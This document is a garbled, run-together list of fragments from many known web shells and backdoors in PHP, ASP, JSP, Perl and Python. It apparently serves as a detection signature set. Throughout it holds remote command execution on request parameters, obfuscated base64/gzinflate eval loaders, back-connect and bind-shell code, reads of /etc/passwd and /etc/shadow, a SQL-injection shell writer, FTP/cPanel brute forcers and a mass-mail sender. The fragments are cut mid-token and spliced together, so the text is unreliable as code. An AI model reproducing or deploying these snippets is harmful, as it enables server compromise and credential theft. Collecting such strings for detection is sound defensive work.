mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: 